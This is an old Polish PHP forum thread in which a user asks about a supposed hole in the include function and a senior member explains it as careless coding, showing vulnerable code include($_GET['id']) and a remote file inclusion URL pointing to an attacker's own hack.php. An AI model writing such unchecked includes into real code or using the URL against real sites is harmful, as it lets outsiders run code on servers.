 include |
| include |
Post
#1
|
|
|
Grupa: Zarejestrowani Postów: 581 Pomógł: 0 Dołączył: 21.07.2003 Skąd: Jasło Ostrzeżenie: (0%) 
 |
czy ktoś wie jaka jest dziura w funkcji include ostatnio czytałem ze hakerzy dzieki odkrytej dziurze w funkcji include hakuja bez problemu stronki :?: :?: :?:
|
 |
 
|
 |
|
Post
#2
|
|
|
Grupa: Przyjaciele php.pl Postów: 2 335 Pomógł: 6 Dołączył: 7.03.2002 Ostrzeżenie: (0%)
|
php Pro => php
Bledu w includzie nie ma. Jedyny blad jaki mozna wykorzystac to glupota lub niewiedza ludzi piszacych skrypt. Przykladowo: link do strony z artykulami wyglada tak www.example.pl/index.php?id=artykuly.php A w glownym pliku mamy np tak: [php:1:388bfe2a22]include( $_GET['id'] );[/php:1:388bfe2a22] lub: www.example.pl/index.php?id=artykuly [php:1:388bfe2a22]include( $_GET['id'].".php" );[/php:1:388bfe2a22] Teraz wystarczy dac np: www.example.pl/index.php?id=http://www.naszserver.pl/hack.php czy www.example.pl/index.php?id=http://www.naszserver.pl/hack P.S. kubatron: przeczytaj uwaznie regulamin i podpisy pod forami. |
|
|
|
kubatron include 26.08.2003, 20:43:08 
Wankster php Pro?
Gdzie to wyczytałeś :?: 26.08.2003, 20:45:17 kubatron na stronie 26.08.2003, 21:39:21 
zalew wklejenie linku i cytatu przewyzsza twoje sily ?
... 26.08.2003, 21:48:43  |
|
Aktualny czas: 24.12.2025 - 05:25 |
